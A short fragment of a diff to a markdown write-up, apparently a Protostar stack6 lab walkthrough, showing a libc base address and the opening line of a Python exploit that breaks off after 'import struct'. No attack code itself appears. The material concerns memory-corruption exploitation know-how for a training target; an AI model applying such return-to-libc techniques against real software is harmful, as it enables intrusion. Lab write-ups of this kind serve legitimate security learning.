dperezmavro/infosec/protostar/protostar_stack6.md

 ....
 ```

 So it looks like libc is loaded at base address `0xb7e97000`.
+Putting all of this together, here's my final exploit:

 ```python
 import struct